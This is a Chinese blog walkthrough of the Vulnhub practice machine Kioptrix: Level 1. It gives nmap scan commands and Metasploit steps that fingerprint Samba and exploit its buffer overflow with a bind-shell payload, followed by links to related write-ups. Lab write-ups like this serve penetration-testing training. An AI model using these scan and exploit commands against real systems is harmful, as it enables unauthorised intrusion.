Vulnhub-靶机-Kioptrix: Level 1 (#1)

最新推荐文章于 2024-03-12 21:04:08 发布
最新推荐文章于 2024-03-12 21:04:08 发布
阅读量734 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: Vulnhub-靶机 文章标签: 靶机 网络安全 渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43264813/article/details/113308285
本文详细记录了通过Vulnhub平台对Kioptrix:Level1靶机进行信息收集与漏洞利用的过程。首先,使用nmap确定靶机地址并进行全端口扫描,发现139端口上的samba服务。接着,通过msfconsole查询samba版本,发现存在缓冲区溢出漏洞。最后,利用msf模块设置payload,成功获取shell,揭示了靶机的安全问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Vulnhub—靶机—Kioptrix: Level 1 (#1)

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

文章目录

一、信息收集

【步骤一】使用nmap确定目标靶机地址:
【命令】nmap -sP 192.168.43.0/24
在这里插入图片描述

【步骤二】对目标靶机进行全端口扫描:
【命令】nmap -n -sC -sV -p- 192.168.43.159
在这里插入图片描述

【步骤三】在139端口上运行着samba,使用msf模块进行samba版号查询
【命令】
msfconsole
search smb_version
use 0
set rhosts 192.168.1.104
set threads 50
run
在这里插入图片描述

二、漏洞利用

【步骤五】根据samba版本在网上查询发现有一个缓冲区溢出漏洞,在msf查找
在这里插入图片描述

【步骤六】使用11模块,设置payload为linux的shell
【命令】
use 11
set rhost 192.168.43.159
set payload linux/x86/shell_bind_tcp
run
在这里插入图片描述

三、Flag

【flag】

KIOPTRIX: LEVEL 1-VulnHub靶机学习第二篇
qq_27466929的博客
08-23 634
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1
KIOPTRIX: LEVEL 1.1-VulnHub靶机学习第三篇
qq_27466929的博客
08-25 1020
VulnHub靶机学习第三篇:KIOPTRIX: LEVEL 1.1
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
vulnhub Kioptrix: Level 1 (#1)
箭雨镜屋
11-16 1792
本文使用的方法是利用apache mod_ssl 2.8.4的Remote Buffer Overflow漏洞(CVE-2002-0082)getshell并拿到root权限
Kioptrix Level 1(#1)
MD@@nr丫卡uer
12-08 553
Kioptrix Level 1(#1) 目标:Kioptrix Level 1(VMware) 攻击机:kali(192.168.43.80) 网关:192.168.43.255 #1查看Kioptrix在内网的ip地址 nmap 192.168.43.0/24 -n -sP -sn -n 不做DNS解析 -sP ping扫描 -sn 不做端口扫描 得到ip192.168.43.36 #2查看端口开放情况(nmap) nmap 192.168.43.36 -O -sS -sV -O
VulnHub——Kioptrix Level 1
江左盟的博客
04-18 692
简介 信息收集 使用fping -agq 192.168.204.0/24探测局域网内其它主机,发现存在其它3台主机,如图: 使用nmap --min-rate 10000 -T5 192.168.0.102 192.168.0.100 192.168.0.126快速扫描这三台主机,发现只有一台是VMware,且开启了22,80,111,139,443和1024端口,如图: ...
oscp——Kioptrix: Level 1 (#1)
王嘟嘟的博客
01-31 1163
0x00 前言 这个是第十七台机子了,网上说这个机子是非常简单的,所以来试验一下 链接 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 0x01 信息收集 1.IP 2.端口 0x02 攻击 1.端口 这里可以看到80端口开放了OpenSSL 使用nikto进行扫描(我记得oscp考试貌似不让使用工具) nikto -host 192....
Vulnhub靶机Kioptrix_Level1
最新发布
qq_48904485的博客
03-12 1214
运行环境:Virtualbox攻击机:kali(192.168.56.101靶机Kioptrix_Level1192.168.56.105)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
KIOPTRIX: LEVEL 1.3-VulnHub靶机学习第五篇
qq_27466929的博客
09-11 1370
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.3
KIOPTRIX: LEVEL 1 (#1)
logan_logan的博客
12-19 573
KIOPTRIX: LEVEL 1 (#1) 1.浏览器输入地址打开,是一个Test page网页,接下来开始进行信息收集; 2.信息收集 2.1 使用namp工具对端口进行扫描 发现apache的版本较老,同时开了samba服务,接下来考虑对这两个信息进行更深入的验证。 2.2 使用gobuster枚举目录 对扫描的目录进行验证之后发现没有多少有用信息; 3.漏洞探测 3.1 apache漏洞探测 在kali里面搜索漏洞,接下来开始进行尝试 3.2 samba漏洞探测 使用msf探测到samba版
vulhub——Kioptrix: Level 1 (#1)
战神/calmness的博客
06-04 351
下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar 目标地址:192.168.243.37 攻击地址:192.168.18.148 目录 下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar 信息收集 MSF 建立连接 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh..
vulnhub靶场 Kioptrix-level-1
qq_69775412的博客
10-08 758
简介: vulnhub是一个提供靶场环境的平台。而Kioptrix-level-1就是一个对新手比较友好的靶场。初学渗透的同学可以做做试试看,项目地址如下。
Vulnhub通关】KioptrixLevel 1 (#1)
icewolf00的博客
01-24 1392
注意:本文转载自本人稀土掘金博客。
Kioptrix Level 1 古老的 Apache&KVM1靶场练习
jockerboss的博客
02-27 1029
小白也能看懂的vulnhub KioptrixVM1 靶场练习&KVM1练习 渗透实战
Kioptrix Level 1 靶机wp
m0_52496313的博客
08-10 1180
Kioptrix Level 1 靶机wp
VulnHub Kioptrix Level 1进行渗透测试的总结与过程
Ba1_Ma0的博客
03-01 1733
Kioptrix_Level_1 主机发现 用netdiscover工具进行内网主机发现。 Netdiscover简介:专用的二层发现工具。拥有主动和被动发现两种方式。 我使用以下命令: netdiscover -i eth0 命令解释 -i:网卡,选择你监控的网卡。比如eth0。 如图: 工具执行后内容: ip192.168.1.104与ip192.168.1.103都是我的主机,只有ip192.168.1.102是未知的主机,所以目标主机ip为192.168.1.102。 内网发现也能用nm
VulnHub系列』Kioptrix: Level 1-Walkthrough
ins1ght的博客
11-02 1462
靶机发布日期:2010年2月17日,难度:入门级。拿起枪不用瞄准,扣动扳机即可。
KIOPTRIX: LEVEL 1 (#1)
qq_74240553的博客
02-18 367
vulnhub靶机
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.youkuaiyun.com/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.youkuaiyun.com/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.youkuaiyun.com/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值